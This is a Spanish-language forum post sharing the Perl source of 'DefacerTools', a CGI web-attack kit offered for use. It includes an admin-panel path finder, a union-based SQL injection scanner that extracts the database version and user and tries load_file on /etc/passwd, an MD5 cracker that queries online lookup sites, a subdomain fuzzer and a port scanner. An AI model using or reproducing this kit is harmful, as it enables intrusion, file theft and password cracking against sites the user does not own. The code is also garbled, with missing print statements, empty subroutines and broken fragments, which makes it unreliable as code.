Hola aca les traigo un regalo de navidad que hice en 3 horas , es un programa en CGI para usar en webs que
soporten el mismo , yo hice todas las pruebas con xampp y al parecer todo funciona bien.
Las funciones del programa son :
- HexConverter
- PanelFinder
- PathsFinder
- SQLi Scanner
- FuzzDNS
- FinderPass
- PortScanner
El codigo del programa (formateado con perltidy) es
defacertools.cgi#!"\xampp\perl\bin\perl.exe"
#
#DefacerTools 0.5
#
#(C) Doddy Hackman 2012
#
#
use CGI;
use LWP::UserAgent;
use URI
::Split qw(uri_split
); use HTML::LinkExtor;
use IO::Socket;
@panels = (
'admin/admin.asp', 'admin/login.asp',
'admin/index.asp', 'admin/admin.aspx',
'admin/login.aspx', 'admin/index.aspx',
'admin/webmaster.asp', 'admin/webmaster.aspx',
'asp/admin/index.asp', 'asp/admin/index.aspx',
'asp/admin/admin.asp', 'asp/admin/admin.aspx',
'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx',
'admin/', 'login.asp',
'login.aspx', 'admin.asp',
'admin.aspx', 'webmaster.aspx',
'webmaster.asp', 'login/index.asp',
'login/index.aspx', 'login/login.asp',
'login/login.aspx', 'login/admin.asp',
'login/admin.aspx', 'administracion/index.asp',
'administracion/index.aspx', 'administracion/login.asp',
'administracion/login.aspx', 'administracion/webmaster.asp',
'administracion/webmaster.aspx', 'administracion/admin.asp',
'administracion/admin.aspx', 'php/admin/',
'admin/admin.php', 'admin/index.php',
'admin/login.php', 'admin/system.php',
'admin/ingresar.php', 'admin/administrador.php',
'admin/default.php', 'administracion/',
'administracion/index.php', 'administracion/login.php',
'administracion/ingresar.php', 'administracion/admin.php',
'administration/', 'administration/index.php',
'administration/login.php', 'administrator/index.php',
'administrator/login.php', 'administrator/system.php',
'system/', 'system/login.php',
'admin.php', 'login.php',
'administrador.php', 'administration.php',
'administrator.php', 'admin1.html',
'admin1.php', 'admin2.php',
'admin2.html', 'yonetim.php',
'yonetim.html', 'yonetici.php',
'yonetici.html', 'adm/',
'admin/account.php', 'admin/account.html',
'admin/index.html', 'admin/login.html',
'admin/home.php', 'admin/controlpanel.html',
'admin/controlpanel.php', 'admin.html',
'admin/cp.php', 'admin/cp.html',
'cp.php', 'cp.html',
'administrator/', 'administrator/index.html',
'administrator/login.html', 'administrator/account.html',
'administrator/account.php', 'administrator.html',
'login.html', 'modelsearch/login.php',
'moderator.php', 'moderator.html',
'moderator/login.php', 'moderator/login.html',
'moderator/admin.php', 'moderator/admin.html',
'moderator/', 'account.php',
'account.html', 'controlpanel/',
'controlpanel.php', 'controlpanel.html',
'admincontrol.php', 'admincontrol.html',
'adminpanel.php', 'adminpanel.html',
'admin1.asp', 'admin2.asp',
'yonetim.asp', 'yonetici.asp',
'admin/account.asp', 'admin/home.asp',
'admin/controlpanel.asp', 'admin/cp.asp',
'cp.asp', 'administrator/index.asp',
'administrator/login.asp', 'administrator/account.asp',
'administrator.asp', 'modelsearch/login.asp',
'moderator.asp', 'moderator/login.asp',
'moderator/admin.asp', 'account.asp',
'controlpanel.asp', 'admincontrol.asp',
'adminpanel.asp', 'fileadmin/',
'fileadmin.php', 'fileadmin.asp',
'fileadmin.html', 'administration.html',
'sysadmin.php', 'sysadmin.html',
'phpmyadmin/', 'myadmin/',
'sysadmin.asp', 'sysadmin/',
'ur-admin.asp', 'ur-admin.php',
'ur-admin.html', 'ur-admin/',
'Server.php', 'Server.html',
'Server.asp', 'Server/',
'wp-admin/', 'administr8.php',
'administr8.html', 'administr8/',
'administr8.asp', 'webadmin/',
'webadmin.php', 'webadmin.asp',
'webadmin.html', 'administratie/',
'admins/', 'admins.php',
'admins.asp', 'admins.html',
'administrivia/', 'Database_Administration/',
'WebAdmin/', 'useradmin/',
'sysadmins/', 'admin1/',
'system-administration/', 'administrators/',
'pgadmin/', 'directadmin/',
'staradmin/', 'ServerAdministrator/',
'SysAdmin/', 'administer/',
'LiveUser_Admin/', 'sys-admin/',
'typo3/', 'panel/',
'cpanel/', 'cPanel/',
'cpanel_file/', 'platz_login/',
'rcLogin/', 'blogindex/',
'formslogin/', 'autologin/',
'support_login/', 'meta_login/',
'manuallogin/', 'simpleLogin/',
'loginflat/', 'utility_login/',
'showlogin/', 'memlogin/',
'members/', 'login-redirect/',
'sub-login/', 'wp-login/',
'login1/', 'dir-login/',
'login_db/', 'xlogin/',
'smblogin/', 'customer_login/',
'UserLogin/', 'login-us/',
'acct_login/', 'admin_area/',
'bigadmin/', 'project-admins/',
'phppgadmin/', 'pureadmin/',
'sql-admin/', 'radmind/',
'openvpnadmin/', 'wizmysqladmin/',
'vadmind/', 'ezsqliteadmin/',
'hpwebjetadmin/', 'newsadmin/',
'adminpro/', 'Lotus_Domino_Admin/',
'bbadmin/', 'vmailadmin/',
'Indy_admin/', 'ccp14admin/',
'irc-macadmin/', 'banneradmin/',
'sshadmin/', 'phpldapadmin/',
'macadmin/', 'administratoraccounts/',
'admin4_account/', 'admin4_colon/',
'radmind-1/', 'Super-Admin/',
'AdminTools/', 'cmsadmin/',
'SysAdmin2/', 'globes_admin/',
'cadmins/', 'phpSQLiteAdmin/',
'navSiteAdmin/', 'server_admin_small/',
'logo_sysadmin/', 'server/',
'database_administration/', 'power_user/',
'system_administration/', 'ss_vms_admin_sm/'
);
my @dns = ('www');
#my @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');
my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);
my %rta;
my $que = new CGI;
my @ques = $que->param;
for (@ques) {
$rta{$_} = $que->param($_);
}
print "Content-type:text/html\n\n";
<style type=text/css>
.main {
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: #00FF00;
}
#pie {
position: absolute;
bottom: 0;
}
body,a:link {
font: normal 16px Verdana, Arial, Helvetica,
sans-serif;
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}
input,table.outset,table.bord,table,textarea,select {
background-color:black;color:#00FF00;
border: solid 1px #00FF00;
border-color:#00FF00
}
a:link,a:visited,a:active {
color: #00FF00;
font: normal 16px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}
</style>";
if ( $rta{'hex'} ) {
logouno();
qq(<form method
=post action
=''><b>Text to encode
: </b
><input type
=text name
=textocode value
=test
><input type
=submit name
=codificar value
=Encode
></form
>); copyright();
}
elsif ( $rta{'textocode'} ) {
logouno();
print "[+] Encode : <b>" . encode
( $rta{'textocode'} ) . "</b><br><br>"; copyright();
}
elsif ( $rta{'panelfinder'} ) {
logodos();
qq(<form method
=post action
=''><b>Page
: </b
><input type
=text name
=buscarpanel value
=http
://localhost
/><input type
=submit value
=Find
></form
>); copyright();
}
elsif ( $rta{'buscarpanel'} ) {
my $page = $rta{'buscarpanel'};
logodos();
print "<br>[+] Scanning $page<br><br>"; for $path (@panels) {
$code = tomax( $page . "/" . $path );
if ( $code->is_success ) {
print "[Link] : " . $page . "/" . $path . "<br>"; }
}
print "<br><br>[+] Finish<br>"; copyright();
}
elsif ( $rta{'pathsfinder'} ) {
logotres();
qq(<form method
=post action
=''><b>Page
: </b
><input type
=text name
=buscarpaths value
=http
://localhost
/doddy
><input type
=submit name
=codificar value
=Find
></form
>); copyright();
}
elsif ( $rta{'buscarpaths'} ) {
logotres();
my $page = $rta{'buscarpaths'};
my $code = toma($page);
my @links = get_links($code);
print "<br><br>[+] Finding paths<br><br>";
for my $com (@links) {
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
if ( $path =~ /\/(.*)$/ ) {
my $path1 = $1;
$page =~ s/$path1//ig;
my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
if ( $path =~ /(.*)\// ) {
my $parche = $1;
unless ( $repetidos =~ /$parche/ ) {
$repetidos .= " " . $parche;
my $code = toma( "http://" . $auth . $parche );
if ( $code =~ /Index of (.*)</ig ) {
my $dir_found = $1;
print "[+] Directory Found : $page/$dir_found<br>"; }
}
}
}
}
print "<br><br>[+]Finished<br>"; copyright();
}
elsif ( $rta{'sqliscanner'} ) {
logocuatro();
qq(<form method
=post action
=''><b>Page
: </b
><input type
=text name
=buscarsql value
=http
://localhost
/sql
.php
?id
=><input type
=submit name
=codificar value
=Scan
></form
>); copyright();
}
elsif ( $rta{'buscarsql'} ) {
logocuatro();
print "<br><br>[+] Scanning page<br><br>"; &length( $rta{'buscarsql'} );
print "<br><br>[+] Finished"; copyright();
}
elsif ( $rta{'fuzzdns'} ) {
logocinco();
qq(<form method
=post action
=''><b>Host
: </b
><input type
=text name
=buscardns value
=google
.com
><input type
=submit name
=codificar value
=Scan
></form
>); copyright();
}
elsif ( $rta{'buscardns'} ) {
logocinco();
my $page = $rta{'buscardns'};
print "<br><br>[+] Searching DNS to " . $page . ".....<br><br><br>"; for my $path (@dns) {
$code = tomax( "http://" . $path . "." . $page );
if ( $code->is_success ) {
print "[+] Found : http://" . $path . "." . $page . "<br>"; }
}
print "<br><br>[+] Finished<br><br>"; copyright();
}
elsif ( $rta{'finderpass'} ) {
logoseis();
qq(<form method
=post action
=''><b>MD5
: </b
><input type
=text name
=buscarhash value
=202cb962ac59075b964b07152d234b70
><input type
=submit name
=codificar value
=Scan
></form
>); copyright();
}
elsif ( $rta{'buscarhash'} ) {
logoseis();
&crackit( $rta{'buscarhash'} );
copyright();
}
elsif ( $rta{'portscanner'} ) {
logosiete();
qq(<form method
=post action
=''><b>IP
: </b
><input type
=text name
=buscarpuertos value
=localhost
><input type
=submit name
=codificar value
=Scan
></form
>); copyright();
}
elsif ( $rta{'buscarpuertos'} ) {
logosiete();
scanuno( $rta{'buscarpuertos'} );
copyright();
}
elsif ( $rta{'home'} ) {
sintax();
}
else {
sintax();
}
sub sintax {
<title>DefacerTools 0.5 (C) Doddy Hackman 2012</title>
<br><br>
<h1><center>DefacerTools</center></h1>
<br><br>
<center>
<table border=1>
<td class=main><center><b>Tools</b></center></td><tr>
<td class
=main
><a href
=?hex=true
><center>HexConverter
</center
></a
></td
><tr> <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr>
<td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr>
<td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr>
<td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr>
<td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr>
<td class=main><a href=?portscanner=true><center>PortScanner</center></a></td>
</table>
</center>
);
}
sub logouno {
<center>
<pre>
@ @ @@@@
@ @ @ @ @
@ @ @ @
@ @ @@@ @ @ @ @@@ @ @@ @ @ @@@ @@ @@ @@@ @@
@@@@@@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @
@ @ @@@@@ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @
@ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @@@ @ @ @@@@ @@@ @ @ @ @@@ @ @ @@@ @
</pre>
);
}
sub logodos {
<center>
<pre>
@@@@@ @ @@@@@ @ @
@ @ @ @ @
@ @ @ @ @
@ @ @@@ @ @@ @@@ @ @ @ @ @@ @@@@ @@@ @@
@@@@@ @ @@ @ @ @ @ @@@@ @ @@ @ @ @ @ @ @
@ @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @@@@@ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @@@@ @ @ @@@ @ @ @ @ @ @@@@ @@@ @
</pre>
);
}
sub logotres {
<center>
<pre>
@@@@@ @ @@@@@ @ @
@ @ @ @ @ @
@ @ @ @ @ @
@ @ @@@ @@ @ @@ @@ @ @ @ @@ @@@@ @@@ @@
@@@@@ @ @ @@ @ @ @ @@@@ @ @@ @ @ @ @ @ @
@ @@@@ @ @ @ @ @ @ @ @ @ @ @@@@@ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @@@@ @ @ @ @@ @ @ @ @ @@@@ @@@ @
</pre>
);
}
sub logocuatro {
<center>
<pre>
@@@ @@@@ @ @ @@@
@ @ @ @ @ @ @ @
@ @ @ @ @ @
@ @ @ @ @ @ @@@ @@@ @ @@ @ @@ @@@ @@
@@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @
@ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@@@ @@@@ @@@@@ @ @@@ @@@ @@@@ @ @ @ @ @@@ @
@
</pre>
);
}
sub logocinco {
<center>
<pre>
@@@@@ @@@@ @ @ @@@
@ @ @ @@ @ @ @
@ @ @ @@ @ @
@ @ @ @@@@ @@@@ @ @ @ @ @ @
@@@@ @ @ @ @ @ @ @ @ @ @@@
@ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @@ @
@ @ @@ @ @ @ @ @ @@ @ @
@ @@ @ @@@@ @@@@ @@@@ @ @ @@@
</pre>
);
}
sub logoseis {
<center>
<pre>
@@@@@ @ @ @@@@@
@ @ @ @
@ @ @ @
@ @ @ @@ @@@@ @@@ @@ @ @ @@@ @@ @@
@@@@ @ @@ @ @ @ @ @ @ @@@@@ @ @ @ @ @
@ @ @ @ @ @ @@@@@ @ @ @@@@ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @@@@ @@@ @ @ @@@@ @@ @@
</pre>
);
}
sub logosiete {
<center>
<pre>
@@@@@ @@@
@ @ @ @ @
@ @ @ @
@ @ @@@ @@ @@ @ @@@ @@@ @ @@ @ @@ @@@ @@
@@@@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @
@ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @@@ @ @ @@@ @@@ @@@@ @ @ @ @ @@@ @
</pre>
);
}
sub copyright {
qq(<br><br><br><br><br><br><br><center><a href
=?home
=true
><b>Return to home
</b
></a
></center
><br><br>); }
print "<br>[+] Looking for the number of columns<br><br>"; my $rows = "0";
my $asc;
my $page = $_[0];
( $pass1, $pass2 ) = &bypass( $_[1] );
$alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
$total = "1";
for my $rows ( 2 .. 200 ) {
$asc .=
"," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
$total .= "," . $rows;
$injection =
$page . "1"
. $pass1 . "and"
. $pass1 . "1=0"
. $pass1 . "union"
. $pass1
. "select"
. $pass1
. $alert
. $asc;
$test = toma($injection);
if ( $test =~ /RATSXPDOWN/ ) {
@number = $test =~ m{RATSXPDOWN
(\d+)RATSXPDOWN
}g
; $control = 1;
my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
my $save = $auth;
$total =~ s/$number[0]/hackman/;
. $page . "1"
. $pass1 . "and"
. $pass1 . "1=0"
. $pass1 . "union"
. $pass1
. "select"
. $pass1
. $total . "<br>";
details(
$page . "1"
. $pass1 . "and"
. $pass1 . "1=0"
. $pass1 . "union"
. $pass1
. "select"
. $pass1
. $total,
"--", ""
);
}
}
}
sub details {
my ( $page, $bypass, $save ) = @_;
( $pass1, $pass2 ) = &bypass($bypass);
if ( $page =~ /(.*)hackman(.*)/ig ) {
print "<br>[+] Searching information..<br><br>"; my ( $start, $end ) = ( $1, $2 );
$inforschema =
$start
. "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
. $end
. $pass1 . "from"
. $pass1
. "information_schema.tables"
. $pass2;
$mysqluser =
$start
. "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
. $end
. $pass1 . "from"
. $pass1
. "mysql.user"
. $pass2;
$test3 =
toma( $start
. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
. $end
. $pass2 );
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ( $test2 =~ /ERTOR854/ig ) {
print "[mysql.user] : ON<br>"; }
else {
print "[mysql.user] : OFF<br>"; }
if ( $test1 =~ /ERTOR854/ig ) {
print "[information_schema.tables] : ON<br>"; }
else {
print "[information_schema.tables] : OFF<br>"; }
if ( $test3 =~ /ERTOR854/ig ) {
print "[load_file] : ON<br>"; }
$concat =
"unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
$injection = $start . $concat . $end . $pass2;
$code = toma($injection);
if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
"<br>[!] DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>";
}
else {
print "<br>[-] Not found any data<br>"; }
}
}
sub encode {
my $string = $_[0];
$hex = '0x';
for ( split //, $string ) { }
}
sub bypass {
if ( $_[0] eq "/*" ) { return ( "/**/", "/**/" ); } elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); } else { return ( "+", "--" ); } }
sub ascii {
}
sub toma {
return $nave->get( $_[0] )->content; }
sub tomax {
}
sub get_links {
$test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
sub agarrar {
my ( $a, %b ) = @_;
}
}
sub crackit {
my $secret = $_[0];
print "<br><br>[+] Cracking $_[0]<br><br>";
my %hash = (
'http://passcracking.com/' => {
'tipo' => 'post',
'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex' =>
'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},
'http://md5.hashcracking.com/search.php?md5=' => {
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' => {
'tipo' => 'post',
'variables' => '{"query" => $_[0], "submit" => " Crack "}',
'regex' =>
'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' => {
'tipo' => 'post',
'variables' =>
'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\
/div
><div class
="result">$_[0]:(.+)<br\
/>), },
'http://www.hashchecker.com/index.php?_sls=search_hash' => {
'tipo' => 'post',
'variables' => '{"search_field" => $_[0], "Submit" => "search"}',
'regex' =>
'<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' => {
'tipo' => 'get',
'regex' => qq(MD5 ðàñøèôðîâàí
: <b>(.*)<\
/b
><br><form action
=\
"\">), }
);
for my $data ( keys %hash ) {
if ( $hash{$data}{tipo} eq "get" ) {
$code = toma( $data . $_[0] );
if ( $code =~ /$hash{$data}{regex}/ig ) {
print "<br>[+] Decoded : " . $1 . "<br><br>";
print $secret. ":" . $1 . "<br>";
}
}
else {
$code = tomar( $data, $hash{$data}{variables} );
if ( $code =~ /$hash{$data}{regex}/ig ) {
print $secret. ":" . $1 . "<br>";
}
}
}
print "<br>[+] Finish<br>";
}
sub tomar {
my ( $web, $var ) = @_;
return $nave->post( $web, [ %{$var} ] )->content;
}
sub scanuno {
my %ports = (
"21" => "ftp",
"22" => "ssh",
"25" => "smtp",
"80" => "http",
"110" => "pop3",
"3306" => "mysql"
);
print "<br>[+] Scanning $_[0]<br><br><br>";
for my $port ( keys %ports ) {
if (
new IO::Socket::INET(
PeerAddr => $_[0],
PeerPort => $port,
Proto => "tcp",
Timeout => 0.5
)
)
{
print "[Port] : "
. $port
. " [Service] : "
. $ports{$port} . "<br>";
}
}
print "<br><br>[+] Scan Finish<br>";
}
# The End ?